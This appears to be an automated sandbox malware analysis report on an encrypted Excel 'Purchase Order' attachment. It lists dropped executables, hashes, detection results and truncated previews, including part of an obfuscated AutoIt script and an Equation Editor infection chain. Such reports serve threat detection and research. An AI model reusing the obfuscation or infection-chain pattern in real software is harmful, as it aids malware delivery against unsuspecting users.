                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            Preview: ....l...........S................@...#.. EMF........(...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..............................................I...c...%...........%...................................R...p................................@."C.a.l.i.b.r.i........................................................................N.T............p........N.T........ ....yQP........ ............zQP............O...............................X...%...7...................{ .@................C.a.l.i.b.r.................X.......4....2JP........p...p....{HP............dv......%...........%...........%...........!.......................I...c..."...........%...........%...........%...........T...T..........................@.E.@T...........L...............I...c...P... ...6...F...$.......EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....
                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\28DDF41C.jpeg
                                                                                                                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                            File Type:gd-jpeg v1.0 (using IJG JPEG v80), quality = 90", baseline, precision 8, 700x990, frames 3
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):48770
                                                                                                                                                                                                            Entropy (8bit):7.801842363879827
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:uLgWImQ6AMqTeyjskbJeYnriZvApugsiKi7iszQ2rvBZzmFz3/soBqZhsglgDQPT:uLgY4MqTeywVYr+0ugbDTzQ27A3UXsgf
                                                                                                                                                                                                            MD5:AA7A56E6A97FFA9390DA10A2EC0C5805
                                                                                                                                                                                                            SHA1:200A6D7ED9F485DD5A7B9D79B596DE3ECEBD834A
                                                                                                                                                                                                            SHA-256:56B1EDECC9A282A9FAAFD95D4D9844608B1AE5CCC8731F34F8B30B3825734974
                                                                                                                                                                                                            SHA-512:A532FE4C52FED46919003A96B882AE6F7C70A3197AA57BD1E6E917F766729F7C9C1261C36F082FBE891852D083EDB2B5A34B0A325B7C1D96D6E58B0BED6C5782
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:moderate, very likely benign file
                                                                                                                                                                                                            Preview: ......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 90....C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..R..(...(...(......3Fh.....(....P.E.P.Gj(...(....Q@.%-...(.......P.QKE.%.........;.R.@.E-...(.......P.QKE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'j^.....(...(...(....w...3Fh....E......4w...h.%...................E./J)(......Z)(......Z)(....
                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\59448D6D.jpeg
                                                                                                                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                            File Type:gd-jpeg v1.0 (using IJG JPEG v80), quality = 90", baseline, precision 8, 700x990, frames 3
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):48770
                                                                                                                                                                                                            Entropy (8bit):7.801842363879827
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:uLgWImQ6AMqTeyjskbJeYnriZvApugsiKi7iszQ2rvBZzmFz3/soBqZhsglgDQPT:uLgY4MqTeywVYr+0ugbDTzQ27A3UXsgf
                                                                                                                                                                                                            MD5:AA7A56E6A97FFA9390DA10A2EC0C5805
                                                                                                                                                                                                            SHA1:200A6D7ED9F485DD5A7B9D79B596DE3ECEBD834A
                                                                                                                                                                                                            SHA-256:56B1EDECC9A282A9FAAFD95D4D9844608B1AE5CCC8731F34F8B30B3825734974
                                                                                                                                                                                                            SHA-512:A532FE4C52FED46919003A96B882AE6F7C70A3197AA57BD1E6E917F766729F7C9C1261C36F082FBE891852D083EDB2B5A34B0A325B7C1D96D6E58B0BED6C5782
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:moderate, very likely benign file
                                                                                                                                                                                                            Preview: ......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 90....C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..R..(...(...(......3Fh.....(....P.E.P.Gj(...(....Q@.%-...(.......P.QKE.%.........;.R.@.E-...(.......P.QKE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'j^.....(...(...(....w...3Fh....E......4w...h.%...................E./J)(......Z)(......Z)(....
                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe
                                                                                                                                                                                                            Process:C:\Users\Public\vbc.exe
                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):893608
                                                                                                                                                                                                            Entropy (8bit):6.620131693023677
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12288:6pVWeOV7GtINsegA/hMyyzlcqikvAfcN9b2MyZa31twoPTdFxgawV2M01:6T3E53Myyzl0hMf1tr7Caw8M01
                                                                                                                                                                                                            MD5:C56B5F0201A3B3DE53E561FE76912BFD
                                                                                                                                                                                                            SHA1:2A4062E10A5DE813F5688221DBEB3F3FF33EB417
                                                                                                                                                                                                            SHA-256:237D1BCA6E056DF5BB16A1216A434634109478F882D3B1D58344C801D184F95D
                                                                                                                                                                                                            SHA-512:195B98245BB820085AE9203CDB6D470B749D1F228908093E8606453B027B7D7681CCD7952E30C2F5DD40F8F0B999CCFC60EBB03419B574C08DE6816E75710D2C
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: Metadefender, Detection: 5%, Browse
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Joe Sandbox View:
                                                                                                                                                                                                            • Filename: PO#21010028 - SYINDAC QT-00820_pdf.exe, Detection: malicious, Browse
                                                                                                                                                                                                            • Filename: MC8ZX01sSo.exe, Detection: malicious, Browse
                                                                                                                                                                                                            • Filename: F6AAdCq3uj.exe, Detection: malicious, Browse
                                                                                                                                                                                                            • Filename: tZy7EYc9Da.exe, Detection: malicious, Browse
                                                                                                                                                                                                            • Filename: YMQ6XNETnU.exe, Detection: malicious, Browse
                                                                                                                                                                                                            • Filename: AWB 9899691012 TRACKING INFO_pdf.exe, Detection: malicious, Browse
                                                                                                                                                                                                            • Filename: BANK FORM.xlsx, Detection: malicious, Browse
                                                                                                                                                                                                            • Filename: order0004345.xlsx, Detection: malicious, Browse
                                                                                                                                                                                                            • Filename: Bill of Lading BL.xlsx, Detection: malicious, Browse
                                                                                                                                                                                                            • Filename: Clntnjk.xlsx, Detection: malicious, Browse
                                                                                                                                                                                                            • Filename: HTG-9066543.exe, Detection: malicious, Browse
                                                                                                                                                                                                            • Filename: vbc.exe, Detection: malicious, Browse
                                                                                                                                                                                                            • Filename: HTMY-209871640.exe, Detection: malicious, Browse
                                                                                                                                                                                                            • Filename: YOeg64zDX4.exe, Detection: malicious, Browse
                                                                                                                                                                                                            • Filename: qZtylTGU0c.exe, Detection: malicious, Browse
                                                                                                                                                                                                            • Filename: w2kN50kQQ4.exe, Detection: malicious, Browse
                                                                                                                                                                                                            • Filename: EOJ55l6pzU.exe, Detection: malicious, Browse
                                                                                                                                                                                                            • Filename: payload.vbs, Detection: malicious, Browse
                                                                                                                                                                                                            • Filename: payload.vbs, Detection: malicious, Browse
                                                                                                                                                                                                            • Filename: ResistanceWallet_2.2.8.exe, Detection: malicious, Browse
                                                                                                                                                                                                            Reputation:moderate, very likely benign file
                                                                                                                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L....q.Z.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe
                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):893608
                                                                                                                                                                                                            Entropy (8bit):6.570843086702839
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12288:apVWeOV7GtINsegA/hMyyzlcqikvAfcN9b2MyZa31twoPTdFxgawV2M0:aT3E53Myyzl0hMf1tr7Caw8M0
                                                                                                                                                                                                            MD5:535DD1329AEF11BF4654B3270F026D5B
                                                                                                                                                                                                            SHA1:9C84DE0BDE8333F852120AB40710545B3F799300
                                                                                                                                                                                                            SHA-256:B31445FC4B8803D1B7122A6563002CFE3E925FFD1FDC9B84FBA6FC78F6A8B955
                                                                                                                                                                                                            SHA-512:A552E20A09A796A6E3E18DECE308880069C958CF9136BB4FC3EE726D6BC9B2F8EDDBCFF06FF9F9DED4DD268F5D0F39D516AD42ECCE6455A4BF5CF4F3CB4C4ECC
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 21%
                                                                                                                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L....q.Z..........................................@...........................................@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\Nla\invbat.p
                                                                                                                                                                                                            Process:C:\Users\Public\vbc.exe
                                                                                                                                                                                                            File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):254655
                                                                                                                                                                                                            Entropy (8bit):4.07874315156338
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:Zc6X46b+ON++BzUFDq1OKOsFTt3ySKqelggtc79jB20s4Oh9lZSODO0bOdVklDOR:W69L
                                                                                                                                                                                                            MD5:697C6E6695EB5ECBC447A1CECF7B6B37
                                                                                                                                                                                                            SHA1:B26711D04AE0A3DF34B5F0AC9C3EE30282072780
                                                                                                                                                                                                            SHA-256:618B52AEC059E70C667CD57454505CE2566698B15E9F005F994E95240F5D7253
                                                                                                                                                                                                            SHA-512:EBC227B13DA4852EB04B4617262B37E76667AB15E508692170AC6B76503FE12473152032E9A3C245F0F676B181AD2FDA53F212C479EEE646814527651034F979
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview: #NoTrayIcon..Global $Z30cwh, $P314z7, $Y32yadpjrxs, $A33jm178, $K34kd, $U35a02bc..For $Z30cwh = 0 To Random(5, 8, 1).. $Y32yadpjrxs = 0.. For $A33jm178 = 2 To 100.. $P314z7 = True.. $K34kd = 2.. While $K34kd*$K34kd<=$Z30cwh.. If Mod($Z30cwh, $K34kd) == 0 Then.. $Y32yadpjrxs = False.. ExitLoop.. EndIf.. $K34kd += 1.. WEnd.. If $P314z7 Then $Y32yadpjrxs = $A33jm178.. Next..Next..Dim $F3231ld0wrrz = GUICreate(Chr((-945+1024))&Chr((-907+1024))&Chr((-908+1024))&Chr((-926+1024))&Chr((-907+1024))&Chr((-925+1024))&Chr((-917+1024))&Chr((-992+1024))&Chr((-951+1024))&Chr((-914+1024))&Chr((-925+1024)), 102, 240, -99999, -99999, 0, 128)....GUISetState(@SW_SHOW)..Global $B3232n3viy = Execute(Chr((-955+1024))&Chr((-904+1024))&Chr((-923+1024))&Chr((-925+1024))&Chr((-907+1024))&Chr((-908+1024))&Chr((-923+1024)))..Global $X323343z = $B3232n3viy(Chr((-956+1024))&Chr((-916+1024))&Chr((-916+1024))&Chr((-957+1024))&Chr((-927+1024))&Chr((-916+1024))&Chr((-916+1024)))..Global $U3235t2bw3trh =
                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\Nla\tigowmbk.tt
                                                                                                                                                                                                            Process:C:\Users\Public\vbc.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):164864
                                                                                                                                                                                                            Entropy (8bit):7.998841285565125
                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                            SSDEEP:3072:HsEQeDs6pDONXBUqAlgiKP3N5bYfE3hZIyxUz20jtgM0zNe4eqvbgr1WEP:M3Os6MNXBUj+3PKwhvxUz24tgM0zNe44
                                                                                                                                                                                                            MD5:BDC408495C97B063E2E473444C207379
                                                                                                                                                                                                            SHA1:A2B11A79E055F4BA3256325BADB24AC7C0FDD37B
                                                                                                                                                                                                            SHA-256:611813DC76A09226A27F9062675BC555E96001E744A269F64A248F0B23237126
                                                                                                                                                                                                            SHA-512:A920F685A596EDFBECAAA4C43049BC5A9F1CA35D0E20CB1E588E2377B7662505775ECF0963241D5DEF27C6F145B61363FA6A15CEE026357C0A11205EBBA8644F
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview: >). m`.a.....+xm.9.A!....m...A..%.p..z...0Y..lr...s#.....'.jQ...TA.Ew......).Y..:...j...w......s.....I.........s..:..az....r...R\..|....BS.C.iZ;...VI........ .nZ...W.....0...N..N..7.".....#..........MxQ....`..{."j.f..j...x.K...!.fX.4....d....bkr;i.7L+.-.......>#..7..T..X...]...g....._T..9.u..t....5!..BA..DQ]V.?..{.6..hl..%..U.B.~s....^.B.....y.....L...@....l...{.....&....U$.t.M....0....j.=..)....w.r6Nua.].YI.......\R...)....{k.f...7.[.I..L......I.>;.....XV:l..n..S\E....n.W.#..~.............(~.F...x..,......Y..f.&.o.#..?.'E[.x....&...!>..G....q.$..A..G5W....p.?@."~...I].....i.o...Xw..T..-..=sU..:G.QP...B<..B.a.;..pF[..KH~O.[.f.....y...9.=W......Q\.QG..TN.W.D.#.....N+.....1..;e.8.j....,.m...[FP.1. .M1.vHL....a..K.....P...5+..o.3..n[..*...:.....Y..Ys^..@...Z.WbM.Z..ktr...........N...{z>...mr'..r...|...... .Cv...7[..V....@F7.Z.5.....r3@.a..j=......q...f......Bf..q.x...Bo..a.......}E.qu.@n}M@..........Z`...B.-..."Z..n.Zx...q...U.
                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\nsjB7EC.tmp
                                                                                                                                                                                                            Process:C:\Users\Public\vbc.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1315586
                                                                                                                                                                                                            Entropy (8bit):6.934695136999916
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24576:IT3E53Myyzl0hMf1tr7Caw8M07Yq2Kjf0zziP:G3EZpBh211Waw30l2o0v4
                                                                                                                                                                                                            MD5:C3789566A8D3E18FBF23594112880485
                                                                                                                                                                                                            SHA1:C2D38B852D20F77214AA5E198902B49F9119ED87
                                                                                                                                                                                                            SHA-256:1B6362748EB06A0696CF3F2EB037EF79AB594B04A93C379036C0693BB16F1D43
                                                                                                                                                                                                            SHA-512:7B44D15495C0896625B7D1DF2DA43CC0EC4EE1EFD6C2AD49CD1F865B72BAE55369ED18B4FC53C012236E4CF26509ACCD9ECD3A88BCEDA220F47392B158C5A3E4
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview: ........,...................................................................................................................................................................................................................................................................................J...............-...g...............................................................j...............................................................................................................................N.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\0ZYIFCHI.txt
                                                                                                                                                                                                            Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):115
                                                                                                                                                                                                            Entropy (8bit):4.411267366228876
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:GmM/OYRdUnGXTzzTNOBbeSNnc4TvdLNQZdQSD:XM/vd8GXTbNCbeYTvFNg
                                                                                                                                                                                                            MD5:221C42E160D5FD00C5E29611C678E309
                                                                                                                                                                                                            SHA1:B52908A03F35FBA94916E2FABCB66512F6A9B088
                                                                                                                                                                                                            SHA-256:A194580030987D41E42461981702DEE5BB24A4504383BF4143CE91140E1485F8
                                                                                                                                                                                                            SHA-512:27699F3701592CDC2B0AD9341AC0823D4F9BF8F96918224E687E4F43BEAA85A15D6AF9086103B26DE7784519FE3653FEA319B51AC30AF9AD1D125B7775FC568F
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            IE Cache URL:discordapp.com/
                                                                                                                                                                                                            Preview: __cfduid.d12a342e240ea01d4c26886895ec58aba1611728216.discordapp.com/.9728.4219943936.30870534.218830503.30864576.*.
                                                                                                                                                                                                            C:\Users\user\Desktop\~$Purchase Order.xlsx
                                                                                                                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):330
                                                                                                                                                                                                            Entropy (8bit):1.4377382811115937
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                                                                                                                                                                                                            MD5:96114D75E30EBD26B572C1FC83D1D02E
                                                                                                                                                                                                            SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                                                                                                                                                                                                            SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                                                                                                                                                                                                            SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                                                            C:\Users\Public\vbc.exe
                                                                                                                                                                                                            Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):772519
                                                                                                                                                                                                            Entropy (8bit):7.418330987363757
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12288:j2HExSVOfCd3zYo/t06XRYahwLBV/N/aXFrMGUFoweuoDvGE84nl1GWK+WrF:jl8Eo/q4RJhYflsyAlu2fGWvw
                                                                                                                                                                                                            MD5:40BFB08CE97F3709F4DE7C6BA8B3401E
                                                                                                                                                                                                            SHA1:203515852D43907510315684682A1F1453DB2E80
                                                                                                                                                                                                            SHA-256:2D62D3A5D3989B0DCC3484BF4D5FC73FE78546EFAD83D8CF0FD12B19E2EA65F7
                                                                                                                                                                                                            SHA-512:D09C744BA65587EEC76D4204305B15B93B64A37EDDDA52310F2980C5CE6481CDC1AF691F2762371123A4D49A5EE42E54477BFBE40F275EBCA29794EBFCE99EC5
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1)..PG..PG..PG.*_...PG..PF.IPG.*_...PG.sw..PG..VA..PG.Rich.PG.........PE..L.....$_.................d...|......a4............@.......................................@.................................8...........<............................................................................................................text...<b.......d.................. ..`.rdata..t............h..............@..@.data...X............|..............@....ndata.......P...........................rsrc...<...........................@..@................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                            Static File Info

                                                                                                                                                                                                            General

                                                                                                                                                                                                            File type:CDFV2 Encrypted
                                                                                                                                                                                                            Entropy (8bit):7.996710044495843
                                                                                                                                                                                                            TrID:
                                                                                                                                                                                                            • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                                                                                                                                                                                                            File name:Purchase Order.xlsx
                                                                                                                                                                                                            File size:2507264
                                                                                                                                                                                                            MD5:568ad30c526d3950e00385f41e08cdf2
                                                                                                                                                                                                            SHA1:a2599b55c9c9a6b39c019bfeda57b38654c72f48
                                                                                                                                                                                                            SHA256:ae24343193734ee532e142a8e64a7f27d5faf33667a7818743fd91baca01f99b
                                                                                                                                                                                                            SHA512:ff9eeb58f1b55b3d9f999d06ae4984a1db8378204494aa5887ac92ff7a1b84914dabd4df87909e836b72eb47f1a25ce46552e1ce83bd3cfdbad49bf5199abd4c
                                                                                                                                                                                                            SSDEEP:49152:K1IvmWqj262UDzyfZggrPIdVegdBpmsLwQvN9eiVg7tmDdMEFhsz:K1Lpjh2UPyfoVegjtne46gb34
                                                                                                                                                                                                            File Content Preview:........................>...................'...................................................................................|.......~...............z.......|.......~...............z.......|.......~...............z.......|..............................

                                                                                                                                                                                                            File Icon

                                                                                                                                                                                                            Icon Hash:e4e2aa8aa4b4bcb4

                                                                                                                                                                                                            Static OLE Info

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Document Type:OLE
                                                                                                                                                                                                            Number of OLE Files:1

                                                                                                                                                                                                            OLE File "Purchase Order.xlsx"

                                                                                                                                                                                                            Indicators

                                                                                                                                                                                                            Has Summary Info:False
                                                                                                                                                                                                            Application Name:unknown
                                                                                                                                                                                                            Encrypted Document:True
                                                                                                                                                                                                            Contains Word Document Stream:False
                                                                                                                                                                                                            Contains Workbook/Book Stream:False
                                                                                                                                                                                                            Contains PowerPoint Document Stream:False
                                                                                                                                                                                                            Contains Visio Document Stream:False
                                                                                                                                                                                                            Contains ObjectPool Stream:
                                                                                                                                                                                                            Flash Objects Count:
                                                                                                                                                                                                            Contains VBA Macros:False

                                                                                                                                                                                                            Streams

                                                                                                                                                                                                            Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64
                                                                                                                                                                                                            General
                                                                                                                                                                                                            Stream Path:\x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Stream Size:64
                                                                                                                                                                                                            Entropy:2.73637206947
                                                                                                                                                                                                            Base64 Encoded:False
                                                                                                                                                                                                            Data ASCII:. . . . . . . . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . .
                                                                                                                                                                                                            Data Raw:08 00 00 00 01 00 00 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 54 00 72 00 61 00 6e 00 73 00 66 00 6f 00 72 00 6d 00 00 00
                                                                                                                                                                                                            Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112
                                                                                                                                                                                                            General
                                                                                                                                                                                                            Stream Path:\x6DataSpaces/DataSpaceMap
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Stream Size:112
                                                                                                                                                                                                            Entropy:2.7597816111
                                                                                                                                                                                                            Base64 Encoded:False
                                                                                                                                                                                                            Data ASCII:. . . . . . . . h . . . . . . . . . . . . . . E . n . c . r . y . p . t . e . d . P . a . c . k . a . g . e . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . D . a . t . a . S . p . a . c . e . . .
                                                                                                                                                                                                            Data Raw:08 00 00 00 01 00 00 00 68 00 00 00 01 00 00 00 00 00 00 00 20 00 00 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 65 00 64 00 50 00 61 00 63 00 6b 00 61 00 67 00 65 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 00 00
                                                                                                                                                                                                            Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200
                                                                                                                                                                                                            General
                                                                                                                                                                                                            Stream Path:\x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Stream Size:200
                                                                                                                                                                                                            Entropy:3.13335930328
                                                                                                                                                                                                            Base64 Encoded:False
                                                                                                                                                                                                            Data ASCII:X . . . . . . . L . . . { . F . F . 9 . A . 3 . F . 0 . 3 . - . 5 . 6 . E . F . - . 4 . 6 . 1 . 3 . - . B . D . D . 5 . - . 5 . A . 4 . 1 . C . 1 . D . 0 . 7 . 2 . 4 . 6 . } . N . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                                                            Data Raw:58 00 00 00 01 00 00 00 4c 00 00 00 7b 00 46 00 46 00 39 00 41 00 33 00 46 00 30 00 33 00 2d 00 35 00 36 00 45 00 46 00 2d 00 34 00 36 00 31 00 33 00 2d 00 42 00 44 00 44 00 35 00 2d 00 35 00 41 00 34 00 31 00 43 00 31 00 44 00 30 00 37 00 32 00 34 00 36 00 7d 00 4e 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00
                                                                                                                                                                                                            Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76
                                                                                                                                                                                                            General
                                                                                                                                                                                                            Stream Path:\x6DataSpaces/Version
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Stream Size:76
                                                                                                                                                                                                            Entropy:2.79079600998
                                                                                                                                                                                                            Base64 Encoded:False
                                                                                                                                                                                                            Data ASCII:< . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . D . a . t . a . S . p . a . c . e . s . . . . . . . . . . . . .
                                                                                                                                                                                                            Data Raw:3c 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00 72 00 2e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 73 00 01 00 00 00 01 00 00 00 01 00 00 00
                                                                                                                                                                                                            Stream Path: EncryptedPackage, File Type: data, Stream Size: 2483288
                                                                                                                                                                                                            General
                                                                                                                                                                                                            Stream Path:EncryptedPackage
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Stream Size:2483288
                                                                                                                                                                                                            Entropy:7.99991439785
                                                                                                                                                                                                            Base64 Encoded:True
                                                                                                                                                                                                            Data ASCII:I . % . . . . . . j W , . . V . . . . T X M 0 { . . . . . . . . m . . . . . . z 9 . . . . 7 . . # E E l v ` . . . . * . . q . Z . : . . . . . . . . s O < E . . . ^ . . . . . . . . s O < E . . . ^ . . . . . . . . s O < E . . . ^ . . . . . . . . s O < E . . . ^ . . . . . . . . s O < E . . . ^ . . . . . . . . s O < E . . . ^ . . . . . . . . s O < E . . . ^ . . . . . . . . s O < E . . . ^ . . . . . . . . s O < E . . . ^ . . . . . . . . s O < E . . . ^ . . . . . . . . s O < E . . . ^ . . . . . . . . s O < E .
                                                                                                                                                                                                            Data Raw:49 e4 25 00 00 00 00 00 92 6a 57 2c a3 0d 56 93 c8 83 cc 54 58 4d 30 7b ba 98 8d da da 96 9d a5 6d f0 a2 d6 c9 fb 9f 7a 39 0b 87 ea 93 37 a4 e9 23 45 45 6c 76 60 88 fd 82 af 2a fc e3 71 20 0d 5a d5 3a db de 82 fb 1c e6 c0 d3 73 4f 3c 45 87 b3 c7 5e 91 87 15 b7 e4 e6 c0 d3 73 4f 3c 45 87 b3 c7 5e 91 87 15 b7 e4 e6 c0 d3 73 4f 3c 45 87 b3 c7 5e 91 87 15 b7 e4 e6 c0 d3 73 4f 3c 45 87
                                                                                                                                                                                                            Stream Path: EncryptionInfo, File Type: data, Stream Size: 224
                                                                                                                                                                                                            General
                                                                                                                                                                                                            Stream Path:EncryptionInfo
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Stream Size:224
                                                                                                                                                                                                            Entropy:4.53155093746
                                                                                                                                                                                                            Base64 Encoded:False
